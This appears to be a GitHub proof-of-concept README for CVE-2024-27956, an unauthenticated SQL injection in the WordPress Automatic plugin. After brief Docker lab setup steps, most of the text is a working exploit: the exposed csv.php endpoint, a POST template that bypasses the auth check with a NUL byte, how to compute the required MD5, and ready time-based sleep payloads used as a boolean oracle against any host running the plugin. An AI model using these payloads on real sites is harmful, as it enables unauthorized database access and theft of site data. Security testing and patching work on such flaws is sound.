truonghuuphuc / CVE-2024-27956

CVE-2024-27956 WordPress Automatic < 3.92.1 - Unauthenticated SQL Injection


CVE-2024-27956

Note

Build the WordPress lab: `docker-compose -f stack.yml up`

Install the vulnerable plugin:

  1. In the WordPress dashboard, choose Plugins > Add New.

  2. Click Upload Plugin.

  3. Choose File -> wp-automatic.zip -> Install Now.

  4. After the installation completes, click Activate Plugin.

Exploit

Endpoint (reachable without authentication):

<HOST>/wp-content/plugins/wp-automatic/inc/csv.php

Request body template (form-encoded POST):

q={{query}}&auth=%00&integ={{md5query}}

  - `q` is the SQL statement to execute.
  - `integ` is the MD5 of the query as the server sees it after form decoding (the `+` in the body is a space, so the hash is of the plain query text).
  - `auth` is a single NUL byte (`%00`), which the vulnerable version accepts in place of a valid auth value.

Time-based proof of the injection. With a true condition the response is delayed by about five seconds:

q=SELECT+IF(1=1,sleep(5),sleep(0))&auth=%00&integ=93cf9aa11e746596d6f31765a7222c9f

With a false condition it returns immediately:

q=SELECT+IF(1=2,sleep(5),sleep(0))&auth=%00&integ=4b1f4024af81df56c3b00679b9b52183

The difference in response time between the two requests is the boolean oracle: any condition can be substituted for `1=1`, and the delay tells you whether it held.
